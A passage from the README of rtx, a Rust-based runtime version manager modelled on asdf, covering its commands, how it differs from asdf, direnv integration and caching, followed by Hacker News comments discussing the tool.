Here is an example showing node.js\nversions:\n\n```bash\n#!/usr/bin/env bash\n\necho \"lts/hydrogen 18\"\necho \"lts/gallium 16\"\necho \"lts/fermium 14\"\n```\n\n> **Note:**\n>\n> Because this is rtx-specific functionality not currently used by asdf it isn't likely to be in any\n> plugin currently, but plugin authors can add this script without impacting asdf users.\n\n## Plugins\n\nrtx uses asdf's plugin ecosystem under the hood. See https://github.com/asdf-vm/asdf-plugins for a\nlist.\n\n## FAQs\n\n### I don't want to put a `.tool-versions` file into my project since git shows it as an untracked file.\n\nYou can make git ignore these files in 3 different ways:\n\n- Adding `.tool-versions` to project's `.gitignore` file. This has the downside that you need to commit the change to the ignore file.\n- Adding `.tool-versions` to project's `.git/info/exclude`. This file is local to your project so there is no need to commit it.\n- Adding `.tool-versions` to global gitignore (`core.excludesFile`). This will cause git to ignore `.tool-versions` files in all projects. You can explicitly add one to a project if needed with `git add --force .tool-versions`.\n\n### How do I create my own plugin?\n\nJust follow the [asdf docs](https://asdf-vm.com/plugins/create.html). Everything should work the same.\nIf it doesn't, please open an issue.\n\n### rtx is failing or not working right\n\nFirst try setting `RTX_LOG_LEVEL=debug` or `RTX_LOG_LEVEL=trace` and see if that gives you more information.\nYou can also set `RTX_LOG_FILE=/path/to/logfile` to write the logs to a file.\n\nIf something is happening with the activate hook, you can try disabling it and calling `eval \"$(rtx hook-env)\"` manually.\nIt can also be helpful to use `rtx env` to see what environment variables it wants to use.\n\nLastly, there is an `rtx doctor` command. It doesn't have much in it but I hope to add more functionality\nto that to help debug issues.\n\n### Windows support?\n\nThis is something we'd like to add! https://github.com/jdxcode/rtx/discussions/66\n\nIt's not a near-term goal and it would require plugin modifications, but\nit should be feasible.\n\n## Commands\n\n### `rtx activate`\n\n```\nEnables rtx to automatically modify runtimes when changing directory\n\nThis should go into your shell's rc file\n(e.g.
~/.bashrc).\nOtherwise, it will only take effect in the current session.\n\nUsage: activate [OPTIONS] [SHELL_TYPE]\n\nArguments:\n [SHELL_TYPE]\n Shell type to generate the script for\n \n [possible values: bash, fish, xonsh, zsh]\n\nOptions:\n -q, --quiet\n Hide the \"rtx: <PLUGIN>@<VERSION>\" message when changing directories\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ eval \"$(rtx activate bash)\"\n $ eval \"$(rtx activate zsh)\"\n $ rtx activate fish | source\n $ execx($(rtx activate xonsh))\n\n```\n### `rtx alias ls`\n\n```\nList aliases\nShows the aliases that can be specified.\nThese can come from user config or from plugins in `bin/list-aliases`.\n\nFor user config, aliases are defined like the following in `~/.config/rtx/config.toml`:\n\n [alias.nodejs]\n lts = \"18.0.0\"\n\nUsage: ls [OPTIONS]\n\nOptions:\n -p, --plugin <PLUGIN>\n Show aliases for <PLUGIN>\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx aliases\n nodejs lts/hydrogen 18.0.0\n\n```\n### `rtx complete`\n\n```\ngenerate shell completions\n\nUsage: complete --shell <SHELL>\n\nOptions:\n -s, --shell <SHELL>\n shell type\n \n [possible values: bash, elvish, fish, powershell, zsh]\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx complete\n\n```\n### `rtx current`\n\n```\nShows currently active, and installed runtime versions\n\nThis is similar to `rtx list --current`, but this\nonly shows the runtime and/or version so it's\ndesigned to fit into scripts more easily.\n\nUsage: current [PLUGIN]\n\nArguments:\n [PLUGIN]\n plugin to show versions of\n \n e.g.: ruby, nodejs\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n # outputs `.tool-versions` compatible format\n $ rtx current\n python 3.11.0 3.10.0\n shfmt 3.6.0\n shellcheck 0.9.0\n nodejs 18.13.0\n\n $ rtx current nodejs\n 18.13.0\n\n # can output multiple versions\n $ rtx current python\n 3.11.0 3.10.0\n\n```\n### `rtx deactivate`\n\n```\ndisable rtx for current shell session\n\nThis can be used to temporarily disable rtx in a shell session.\n\nUsage: deactivate [SHELL_TYPE]\n\nArguments:\n [SHELL_TYPE]\n shell type to generate the script for\n \n [possible values: bash, fish, xonsh, zsh]\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ eval \"$(rtx deactivate bash)\"\n $ eval \"$(rtx deactivate zsh)\"\n $ rtx deactivate fish | source\n $ execx($(rtx deactivate xonsh))\n\n```\n### `rtx direnv activate`\n\n```\nOutput direnv function to use rtx inside direnv\n\nSee https://github.com/jdxcode/rtx#direnv for more information\n\nBecause this generates the legacy files based on currently installed plugins,\nyou should run this command after installing new plugins.
Otherwise\ndirenv may not know to update environment variables when legacy file versions change.\n\nUsage: activate\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx direnv activate > ~/.config/direnv/lib/use_rtx.sh\n $ echo 'use rtx' > .envrc\n $ direnv allow\n\n```\n### `rtx doctor`\n\n```\nCheck rtx installation for possible problems.\n\nUsage: doctor\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx doctor\n [WARN] plugin nodejs is not installed\n\n```\n### `rtx env`\n\n```\nexports env vars to activate rtx in a single shell session\n\nIt's not necessary to use this if you have `rtx activate` in your shell rc file.\nUse this if you don't want to permanently install rtx.\nThis can be used similarly to `asdf shell`.\nUnfortunately, it requires `eval` to work since it's not written in Bash though.\nIt's also useful just to see what environment variables rtx sets.\n\nUsage: env [OPTIONS] [RUNTIME]...\n\nArguments:\n [RUNTIME]...\n runtime version to use\n\nOptions:\n -s, --shell <SHELL>\n Shell type to generate environment variables for\n \n [possible values: bash, fish, xonsh, zsh]\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ eval \"$(rtx env -s bash)\"\n $ eval \"$(rtx env -s zsh)\"\n $ rtx env -s fish | source\n $ execx($(rtx env -s xonsh))\n\n```\n### `rtx exec`\n\n```\nexecute a command with runtime(s) set\n\nuse this to avoid modifying the shell session or running ad-hoc commands with the rtx runtimes\nset.\n\nRuntimes will be loaded from .tool-versions, though they can be overridden with args\nNote that only the plugin specified will be overridden, so if a `.tool-versions` file\nincludes \"nodejs 20\" but you run `rtx exec python@3.11`, it will still load nodejs@20.\n\nThe \"--\" separates runtimes from the commands to pass along to the subprocess.\n\nUsage: exec [OPTIONS] [RUNTIME]...
[-- <COMMAND>...]\n\nArguments:\n [RUNTIME]...\n runtime(s) to start\n \n e.g.: nodejs@20 python@3.10\n\n [COMMAND]...\n the command string to execute (same as --command)\n\nOptions:\n -c, --command <COMMAND>\n the command string to execute\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n rtx exec nodejs@20 -- node ./app.js # launch app.js using node-20.x\n rtx x nodejs@20 -- node ./app.js # shorter alias\n\n # Specify command as a string:\n rtx exec nodejs@20 python@3.11 --command \"node -v && python -V\"\n\n```\n### `rtx global`\n\n```\nsets global .tool-versions to include a specified runtime\n\nthen displays the contents of ~/.tool-versions\nthis file is `$HOME/.tool-versions` by default\nuse `rtx local` to set a runtime version locally in the current directory\n\nUsage: global [OPTIONS] [RUNTIME]...\n\nArguments:\n [RUNTIME]...\n runtime(s) to add to .tool-versions\n \n e.g.: nodejs@20\n if this is a single runtime with no version, the current value of the global\n .tool-versions will be displayed\n\nOptions:\n --pin\n save exact version to `.tool-versions`\n \n e.g.: `rtx global --pin nodejs@20` will save `nodejs 20.0.0` to .tool-versions\n\n --remove <PLUGIN>\n remove the plugin(s) from ~/.tool-versions\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n # set the current version of nodejs to 20.x\n # will use a precise version (e.g.: 20.0.0) in .tool-versions file\n $ rtx global nodejs@20\n\n # set the current version of nodejs to 20.x\n # will use a fuzzy version (e.g.: 20) in .tool-versions file\n $ rtx global --fuzzy nodejs@20\n\n # show the current version of nodejs in ~/.tool-versions\n $ rtx global nodejs\n 20.0.0\n\n```\n### `rtx install`\n\n```\ninstall a runtime\n\nthis will install a runtime to `~/.local/share/rtx/installs/<PLUGIN>/<VERSION>`\nit won't be used simply by being installed, however.\nFor that, you must set up a `.tool-versions` file manually or with `rtx local/global`.\nOr you can call a runtime explicitly with `rtx exec <PLUGIN>@<VERSION> -- <COMMAND>`.\n\nRuntimes will be installed in parallel.
To disable, set `--jobs=1` or `RTX_JOBS=1`\n\nUsage: install [OPTIONS] [RUNTIME]...\n\nArguments:\n [RUNTIME]...\n runtime(s) to install\n \n e.g.: nodejs@20\n\nOptions:\n -p, --plugin <PLUGIN>\n only install runtime(s) for <PLUGIN>\n\n -f, --force\n force reinstall even if already installed\n\n -v, --verbose...\n Show installation output\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx install nodejs@18.0.0 # install specific nodejs version\n $ rtx install nodejs@18 # install fuzzy nodejs version\n $ rtx install nodejs # install version specified in .tool-versions\n $ rtx install # installs all runtimes specified in .tool-versions for installed plugins\n $ rtx install --all # installs all runtimes and all plugins\n\n```\n### `rtx latest`\n\n```\nget the latest runtime version of a plugin's runtimes\n\nUsage: latest <RUNTIME>\n\nArguments:\n <RUNTIME>\n Runtime to get the latest version of\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx latest nodejs@18 # get the latest version of nodejs 18\n 18.0.0\n\n $ rtx latest nodejs # get the latest stable version of nodejs\n 20.0.0\n\n```\n### `rtx local`\n\n```\nSets .tool-versions to include a specific runtime\n\nthen displays the contents of .tool-versions\nuse this to set the runtime version when within a directory\nuse `rtx global` to set a runtime version globally\n\nUsage: local [OPTIONS] [RUNTIME]...\n\nArguments:\n [RUNTIME]...\n runtimes to add to .tool-versions\n \n e.g.: nodejs@20\n if this is a single runtime with no version,\n the current value of .tool-versions will be displayed\n\nOptions:\n -p, --parent\n recurse up to find a .tool-versions file rather than using the current directory only\n by default this command will only set the runtime in the current directory (\"$PWD/.tool-versions\")\n\n --pin\n save exact version to `.tool-versions`\n \n e.g.: `rtx local --pin nodejs@20` will save `nodejs 20.0.0` to .tool-versions\n\n --remove <PLUGIN>\n remove the plugin(s) from .tool-versions\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n # set the current version of nodejs to 20.x for the current directory\n # will use a precise version (e.g.: 20.0.0) in .tool-versions file\n $ rtx local nodejs@20\n\n # set nodejs to 20.x for the current project (recurses up to find .tool-versions)\n $ rtx local -p nodejs@20\n\n # set the current version of nodejs to 20.x for the current directory\n # will use a fuzzy version (e.g.: 20) in .tool-versions file\n $ rtx local --fuzzy nodejs@20\n\n # removes nodejs from .tool-versions\n $ rtx local --remove=nodejs\n\n # show the current version of nodejs in .tool-versions\n $ rtx local nodejs\n 20.0.0\n\n```\n### `rtx ls`\n\n```\nlist installed runtime versions\n\nThe \"arrow (->)\" indicates the runtime is installed, active, and will be used for running commands.\n(Assuming `rtx activate` or `rtx env` is in use).\n\nUsage: ls [OPTIONS]\n\nOptions:\n -p, --plugin <PLUGIN>\n Only show runtimes from [PLUGIN]\n\n -c, --current\n Only show runtimes currently specified in .tool-versions\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx list\n -> nodejs 20.0.0 (set by ~/src/myapp/.tool-versions)\n -> python 3.11.0 (set by ~/.tool-versions)\n python 3.10.0\n\n $ rtx list --current\n -> nodejs 20.0.0 (set by ~/src/myapp/.tool-versions)\n -> python 3.11.0 (set by ~/.tool-versions)\n\n```\n### `rtx ls-remote`\n\n```\nlist runtime versions available for install\n\nnote that these versions are cached for commands like `rtx install nodejs@latest`\nhowever
_this_ command will always clear that cache and fetch the latest remote versions\n\nUsage: ls-remote <PLUGIN>\n\nArguments:\n <PLUGIN>\n Plugin\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx list-remote nodejs\n 18.0.0\n 20.0.0\n\n```\n### `rtx plugins install`\n\n```\ninstall a plugin\n\nnote that rtx can automatically install plugins when you install a runtime\ne.g.: `rtx install nodejs@18` will autoinstall the nodejs plugin\n\nThis behavior can be modified in ~/.rtx/config.toml\n\nUsage: install [OPTIONS] [NAME] [GIT_URL]\n\nArguments:\n [NAME]\n The name of the plugin to install\n \n e.g.: nodejs, ruby\n\n [GIT_URL]\n The git url of the plugin\n \n e.g.: https://github.com/asdf-vm/asdf-nodejs.git\n\nOptions:\n -f, --force\n Reinstall even if plugin exists\n\n -a, --all\n Install all missing plugins\n \n This will only install plugins that have matching shortnames.\n i.e.: they don't need the full git repo url\n\n -v, --verbose...\n Show installation output\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx install nodejs # install the nodejs plugin using the shorthand repo:\n # https://github.com/asdf-vm/asdf-plugins\n\n $ rtx install nodejs https://github.com/asdf-vm/asdf-nodejs.git\n # install the nodejs plugin using the git url\n\n $ rtx install https://github.com/asdf-vm/asdf-nodejs.git\n # install the nodejs plugin using the git url only\n # (nodejs is inferred from the url)\n\n```\n### `rtx plugins ls`\n\n```\nList installed plugins\n\nCan also show remotely available plugins to install.\n\nUsage: ls [OPTIONS]\n\nOptions:\n -a, --all\n list all available remote plugins\n \n same as `rtx plugins ls-remote`\n\n -u, --urls\n show the git url for each plugin\n \n e.g.: https://github.com/asdf-vm/asdf-nodejs.git\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx plugins ls\n nodejs\n ruby\n\n $ rtx plugins ls --urls\n nodejs https://github.com/asdf-vm/asdf-nodejs.git\n ruby https://github.com/asdf-vm/asdf-ruby.git\n\n```\n### `rtx plugins ls-remote`\n\n```\nList all available remote plugins\n\nThese are fetched from https://github.com/asdf-vm/asdf-plugins\n\nExamples:\n $ rtx plugins ls-remote\n\n\nUsage: ls-remote [OPTIONS]\n\nOptions:\n -u, --urls\n show the git url for each plugin\n \n e.g.: https://github.com/asdf-vm/asdf-nodejs.git\n\n -h, --help\n Print help (see a summary with '-h')\n\n```\n### `rtx plugins uninstall`\n\n```\nremoves a plugin\n\nUsage: uninstall <PLUGIN>\n\nArguments:\n <PLUGIN>\n plugin to remove\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx uninstall nodejs\n\n```\n### `rtx plugins update`\n\n```\nupdates a plugin to the latest version\n\nnote: this updates the plugin itself, not the runtime versions\n\nUsage: update [OPTIONS] [PLUGIN]...\n\nArguments:\n [PLUGIN]...\n plugin(s) to update\n\nOptions:\n -a, --all\n update all plugins\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx plugins update --all # update all plugins\n $ rtx plugins update nodejs # update only nodejs\n\n```\n### `rtx settings get`\n\n```\nShow a current setting\n\nThis is the contents of a single entry in ~/.config/rtx/config.toml\n\nNote that aliases are also stored in this file\nbut managed separately with `rtx aliases get`\n\nUsage: get <SETTING>\n\nArguments:\n <SETTING>\n The setting to show\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx settings get legacy_version_file\n true\n\n```\n### `rtx settings ls`\n\n```\nShow current settings\n\nThis is
the contents of ~/.config/rtx/config.toml\n\nNote that aliases are also stored in this file\nbut managed separately with `rtx aliases`\n\nUsage: ls\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx settings\n legacy_version_file = false\n\n```\n### `rtx settings set`\n\n```\nAdd/update a setting\n\nThis modifies the contents of ~/.config/rtx/config.toml\n\nUsage: set <SETTING> <VALUE>\n\nArguments:\n <SETTING>\n The setting to set\n\n <VALUE>\n The value to set\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx settings set legacy_version_file true\n\n```\n### `rtx settings unset`\n\n```\nClears a setting\n\nThis modifies the contents of ~/.config/rtx/config.toml\n\nUsage: unset <SETTING>\n\nArguments:\n <SETTING>\n The setting to remove\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx settings unset legacy_version_file\n\n```\n### `rtx uninstall`\n\n```\nremoves runtime versions\n\nUsage: uninstall <RUNTIME>...\n\nArguments:\n <RUNTIME>...\n runtime(s) to remove\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx uninstall nodejs@18.0.0 # will uninstall specific version\n $ rtx uninstall nodejs # will uninstall current nodejs version\n\n```\n### `rtx version`\n\n```\nShow rtx version\n\nUsage: version\n\nOptions:\n -h, --help\n Print help\n\n```\n\n## Comparison to asdf\n\nrtx is mostly a clone of asdf, but there are notable areas where improvements have been made.\n\n### Performance\n\nasdf made (what I consider) a poor design decision to use shims that go between a call to a runtime\nand the runtime itself. e.g.: when you call `node` it will call an asdf shim file `~/.asdf/shims/node`,\nwhich then calls `asdf exec`, which then calls the correct version of node.\n\nThese shims have terrible performance, adding ~120ms to every runtime call. rtx does not use shims and instead\nupdates `PATH` so that it doesn't have any overhead when simply calling binaries. These shims are the main reason that I wrote this.\n\nI don't think it's possible for asdf to fix these issues. The author of asdf did a great writeup\nof [performance problems](https://stratus3d.com/blog/2022/08/11/asdf-performance/). asdf is written\nin bash which certainly makes it challenging to be performant, however I think the real problem is the\nshim design. I don't think it's possible to fix that without a complete rewrite.\n\nrtx does call an internal command `rtx hook-env` every time the directory has changed, but because\nit's written in Rust, this is very quick\u2014taking ~10ms on my machine. 4ms if there are no changes, 14ms if it's\na full reload.\n\ntl;dr: asdf adds overhead (~120ms) when calling a runtime, rtx adds a small amount of overhead (~10ms)\nwhen the prompt loads.\n\n### Environment variables\n\nasdf only helps manage runtime executables. However, some tools are managed via environment variables\n(notably Java which switches via `JAVA_HOME`). This isn't supported very well in asdf and requires\na separate shell extension just to manage.\n\nHowever asdf _plugins_ have a `bin/exec-env` script that is used for exporting environment variables\nlike [`JAVA_HOME`](https://github.com/halcyon/asdf-java/blob/master/bin/exec-env). rtx simply exports\nthe environment variables from the `bin/exec-env` script in the plugin but places them in the shell\nfor _all_ commands. In asdf it only exports those commands when the shim is called. This means if you\ncall `java` it will set `JAVA_HOME`, but not if you call some Java tool like `mvn`.
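\n\nTo make that concrete, here is an illustrative Rust sketch (not rtx's actual code) of how a plugin's `bin/exec-env` script can be turned into exported environment variables: source it in a bash subshell and read back the resulting environment.\n\n```rust\nuse std::process::Command;\n\n/// Source an exec-env script in bash and collect the resulting environment.\nfn exec_env(script: &str) -> std::io::Result<Vec<(String, String)>> {\n    let out = Command::new(\"bash\")\n        .arg(\"-c\")\n        .arg(format!(\"source {script} >/dev/null 2>&1; env\"))\n        .output()?;\n    Ok(String::from_utf8_lossy(&out.stdout)\n        .lines()\n        .filter_map(|l| {\n            let (k, v) = l.split_once('=')?;\n            Some((k.to_string(), v.to_string()))\n        })\n        .collect())\n}\n\nfn main() -> std::io::Result<()> {\n    // Hypothetical path to a plugin's exec-env script.\n    for (k, v) in exec_env(\"./bin/exec-env\")? {\n        if k == \"JAVA_HOME\" {\n            println!(\"{k}={v}\");\n        }\n    }\n    Ok(())\n}\n```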
\n\nThis means we're just using the existing plugin script but because rtx doesn't use shims it can be\nused for more things. It would be trivial to make a plugin that exports arbitrary environment\nvariables like [dotenv](https://github.com/motdotla/dotenv) or [direnv](https://github.com/direnv/direnv).\n\n### UX\n\nSome commands are the same in asdf but others have been changed. Everything that's possible\nin asdf should be possible in rtx but may use slightly different syntax. rtx has more forgiving commands,\nsuch as using fuzzy-matching, e.g.: `rtx install nodejs@18`. While in asdf you _can_ run\n`asdf install nodejs latest:18`, you can't use `latest:18` in a `.tool-versions` file or many other places.\nIn `rtx` you can use fuzzy-matching everywhere.\n\nasdf requires several steps to install a new runtime if the plugin isn't installed, e.g.:\n\n```sh-session\n$ asdf plugin add nodejs\n$ asdf install nodejs latest:18\n$ asdf local nodejs latest:18\n```\n\nIn `rtx` this can all be done in a single step to set the local runtime version. If the plugin\nand/or runtime needs to be installed it will prompt:\n\n```sh-session\n$ rtx local nodejs@18\nrtx: Would you like to install nodejs@18.13.0? [Y/n] Y\nTrying to update node-build... ok\nDownloading node-v18.13.0-darwin-arm64.tar.gz...\n-> https://nodejs.org/dist/v18.13.0/node-v18.13.0-darwin-arm64.tar.gz\nInstalling node-v18.13.0-darwin-arm64...\nInstalled node-v18.13.0-darwin-arm64 to /Users/jdx/.local/share/rtx/installs/nodejs/18.13.0\n$ node -v\nv18.13.0\n```\n\nI've found asdf to be particularly rigid and difficult to learn. It also made strange decisions like\nhaving `asdf list all` but `asdf latest --all` (why is one a flag and one a positional argument?).\n`rtx` makes heavy use of aliases so you don't need to remember if it's `rtx plugin add nodejs` or\n`rtx plugin install nodejs`. If I can guess what you meant, then I'll try to get rtx to respond\nin the right way.\n\nThat said, there are a lot of great things about asdf. It's the best multi-runtime manager out there\nand I've really been impressed with the plugin system. Most of the design decisions the authors made\nwere very good. I really just have 2 complaints: the shims and the fact it's written in Bash.\n\n## direnv\n\n[direnv](https://direnv.net) and rtx both manage environment variables based on directory. Because they both analyze\nthe current environment variables before and after their respective \"hook\" commands are run, they can conflict with each other.\nAs a result, there were a [number of issues with direnv](https://github.com/jdxcode/rtx/issues/8).\nHowever, we think we've mitigated these. If you find that rtx and direnv are not working well together,\nplease comment on that ticket ideally with a good description of your directory layout so we can\nreproduce the problem.\n\nIf there are remaining issues, they're likely to do with the ordering of PATH. This means it would\nreally only be a problem if you were trying to manage the same runtime with direnv and rtx. For example,\nyou may use `layout python` in an `.envrc` but also be maintaining a `.tool-versions` file with python\nin it as well.\n\nA more typical usage of direnv would be to set some arbitrary environment variables, or add unrelated\nbinaries to PATH.
In these cases, rtx will not interfere with direnv.\n\nAs mentioned in the Quick Start, it is important to make sure that `rtx activate` is called after `direnv hook`\nin the shell rc file. rtx overrides some of the internal direnv state (`DIRENV_DIFF`) so calling\ndirenv first gives rtx the opportunity to make those changes to direnv's state.\n\n### rtx inside of direnv (`use rtx` in `.envrc`)\n\nIf you do encounter issues with `rtx activate`, or just want to use direnv in an alternate way,\nthis is a simpler setup that's less likely to cause issues.\n\nTo do this, first use `rtx` to build a `use_rtx` function that you can use in `.envrc` files:\n\n```sh-session\n$ rtx direnv activate > ~/.config/direnv/lib/use_rtx.sh\n```\n\nNow in your `.envrc` file add the following:\n\n```sh-session\nuse rtx\n```\n\ndirenv will now call rtx to export its environment variables. You'll need to make sure to add `use_rtx`\nto all projects that use rtx (or use direnv's `source_up` to load it from a subdirectory). You can also add `use rtx` to `~/.config/direnv/direnvrc`.\n\nNote that in this method direnv typically won't know to refresh `.tool-versions` files\nunless they're at the same level as a `.envrc` file. You'll likely always want to have\na `.envrc` file next to your `.tool-versions` for this reason. To make this a little\neasier to manage, I encourage _not_ actually using `.tool-versions` at all, and instead\nsetting environment variables entirely in `.envrc`:\n\n```\nexport RTX_NODEJS_VERSION=18.0.0\nexport RTX_PYTHON_VERSION=3.11\n```\n\nOf course if you use `rtx activate`, then these steps won't have been necessary and you can use rtx\nas if direnv was not used.\n\n## Cache Behavior\n\nrtx makes use of caching in many places in order to be efficient. The details about how long to keep\ncache for should eventually all be configurable. There may be gaps in the current behavior where\nthings are hardcoded but I'm happy to add more settings to cover whatever config is needed.\n\nBelow I explain the behavior it uses around caching. If you're seeing behavior where things don't appear\nto be updating, this is a good place to start.\n\n### Plugin Cache\n\nEach plugin has a cache that's stored in `~/.local/share/rtx/plugins/<PLUGIN>/.rtxcache.msgpack.gz`. It stores\nthe list of versions available for that plugin (`rtx ls-remote <PLUGIN>`) and the legacy filenames (see below).\n\nIt is updated daily by default or anytime that `rtx ls-remote` is called explicitly. The file is\ngzipped messagepack; if you want to view it you can run the following (requires [msgpack-cli](https://github.com/msgpack/msgpack-cli)).\n\n```sh-session\ncat ~/.local/share/rtx/plugins/nodejs/.rtxcache.msgpack.gz | gunzip | msgpack-cli decode\n```\n\n### Runtime Cache\n\nEach runtime (language version, e.g.: `nodejs@20.0.0`) has a file called \"runtimeconf\" that's stored\ninside the install directory, e.g.: `~/.local/share/rtx/installs/nodejs/20.0.0/.rtxconf.msgpack`. This stores the\ninformation about the runtime that should not change after installation. Currently this is just the\nbin paths the plugin defines in `bin/list-bin-paths`. By default this is just `/bin`. It's the list\nof paths that rtx will add to `PATH` when the runtime is activated.\n\nI have not seen a plugin which has _dynamic_ bin paths but let me know if you find one. If that is\nthe case, we may need to make this cached instead of static.\n\n\"Runtimeconf\" is stored as uncompressed messagepack and can be viewed with the following:\n\n```\ncat ~/.local/share/rtx/installs/nodejs/18.13.0/.rtxconf.msgpack | msgpack-cli decode\n```
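\n\nIf you'd rather poke at these cache files from Rust than with msgpack-cli, here is a minimal sketch. It assumes the `flate2` and `rmpv` crates; since the cache layout is an rtx internal that may change, it decodes into a generic msgpack value rather than a fixed struct.\n\n```rust\nuse std::fs::File;\nuse std::io::BufReader;\n\nuse flate2::read::GzDecoder;\n\nfn main() -> Result<(), Box<dyn std::error::Error>> {\n    // Gzipped plugin cache, e.g. under ~/.local/share/rtx/plugins/nodejs/\n    let f = File::open(\".rtxcache.msgpack.gz\")?;\n    let mut gz = BufReader::new(GzDecoder::new(f));\n    let plugin_cache = rmpv::decode::read_value(&mut gz)?;\n    println!(\"plugin cache: {plugin_cache}\");\n\n    // Uncompressed runtimeconf, e.g. under ~/.local/share/rtx/installs/nodejs/18.13.0/\n    let f = File::open(\".rtxconf.msgpack\")?;\n    let mut rd = BufReader::new(f);\n    let runtimeconf = rmpv::decode::read_value(&mut rd)?;\n    println!(\"runtimeconf: {runtimeconf}\");\n    Ok(())\n}\n```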
\n\n### Legacy File Cache\n\nIf enabled, rtx will read the legacy filenames such as `.node-version` for\n[asdf-nodejs](https://github.com/asdf-vm/asdf-nodejs). This leverages cache in 2 places where the\nplugin is called:\n\n- [`list-legacy-filenames`](https://github.com/asdf-vm/asdf-nodejs/blob/master/bin/list-legacy-filenames)\n In every plugin I've seen this simply returns a static list of filenames like \".nvmrc .node-version\".\n It's cached alongside the standard \"runtime\" cache which is refreshed daily by default.\n- [`parse-legacy-file`](https://github.com/asdf-vm/asdf-nodejs/blob/master/bin/parse-legacy-file)\n This plugin binary is called to parse a legacy file to get the version out of it. It's relatively\n expensive so every file that gets parsed as a legacy file is cached into `~/.local/share/rtx/legacy_cache`.\n It will remain cached until the file is modified. This is a simple text file whose filename is a hash of the\n legacy file's path.\n\n## Development\n\nRun tests with `just`:\n\n```sh-session\n$ just test\n```\n\nLint the codebase with:\n\n```sh-session\n$ just lint-fix\n```\n\n", "readme_type": "markdown", "hn_comments": "This looks great, will be working with this in the next few days. I've always had a bad relationship with asdf as it seems to break existing tool management in creative ways that I'm unable to untangle without uninstalling it completely (long story, much thrashing of keyboard and mouse).I like the idea, maybe I'll try it soon. I've recently been using asdf-direnv, configured to switch environments once, manually, and so taking shims out of the $PATH. Definitely giving up a bit of the magic for speed, so not sure if I love the tradeoff.I actually view being written in shell as an advantage for asdf. That means I can just submodule it into my dotfiles and bootstrap my tools without extra steps, no matter where I end up.Ohh, this interesting. I love most things about asdf, but not the fact that it's great big heap of bash scripts. I wonder how hard it would be to get this working on (non-WSL) windows and how a truly universal version manager.Will definitely check this out! I'm a long time asdf user but I always struggle with the shims and long timeouts.I occasionally hit 2sec until my node version is resolved.Nice! I tried something similar at github.com/happenslol/qwer, I'll look at yours to see what you did differently :-)Nice! How long does `node -v` take now?EDIT: OK, I see the main trick is to use PATH instead of shims.> rtx does not use shims and instead updates PATH so that it doesn't have any overhead when simply calling binariesThere is a good reason `asdf-vm` uses shims, and is that it does not have to interplay or worry about other tools that set PATH and tools that need a reference to an executable could be simply set to `~/.asdf/shims`.Ill take it for a spin, but this choice might have a lot of consequences that are not easy to foresee.
A good example is `direnv` which as you mention in the README now requires to be set in `.envrc` and then disable global `rtx` hook I guess.Obligatory \"Written in Rust \" after everything written in rust is still funny to me.Glad to see you fixed what I think is a bad UX decision by asdf, using the subcommand `add` for plugins and `install` for runtime versions.This is awesome. Have you seen http://tea.xyz? Made by the creator of brew. I think it has a lot of interesting ideas, especially since it also has some of the same features as asdf/venv/rbenv/etc: managing multiple versions.Figured I'd mention it, because I haven't tried tea yet, but I'm an avid asdf and brew user and I've been looking at asdf alternatives.Great to see someone is trying to provide a better alternative to asdf!> aliases and fuzzy-matchingWhat exactly does fuzzy matching mean? The only examples I see in your README are of the nature rtx install nodejs@20.0.0 Install a specific version number\n rtx install nodejs@20.0 Install a fuzzy version number\n\nHow is this different from doing specifying `nodejs@20.0.x` (which I guess asdf doesn't support)?In any case, I hope that, if I try to install a package/plugin and it doesn't exist, it won't just try to install a plugin/package whose name is similar? :nervous_look.jpg:I have been using asdf for over a year now, and I haven't seen `node -v` take so long. Actually, I used to use nvm and it was much slower than asdf, which was my main motivation to switch.I'm wondering if the lack of slowness I've seen could be due to my simplistic setup: globally set nodejs version, single nodejs version installed, with other tools like git installed by the distro package manager. I also have golang and some other stuff like rclone installed using asdf, but not much more.Did you also have a similar experience when initially installing node? Did you notice what triggered it or when did asdf start to become slow?I like asdf and would like to avoid making it slow on my laptop.Oh and can I safely assume that your home directory is on an SSD and not on an HDD?As mentioned in my other comment already, it's great to see someone is trying to provide a better alternative to asdf!From what I can tell by looking at the documentation of `rtx install`, rtx install # installs all runtimes specified in .tool-versions for installed plugins\n\nand of `rtx plugins install`, install a plugin\n\n note that rtx automatically can install plugins when you install a runtime\ne.g.: `rtx install nodejs@18` will autoinstall the nodejs pluginI take it there is still no way in rtx to simply install all plugins and runtimes listed in .tool-versions, without listing them one by one on the command line? Put differently, I would expect `rtx install` to install all runtimes specified in .tool-versions, including any plugins that are not installed yet.Would this be something that you would consider adding? 
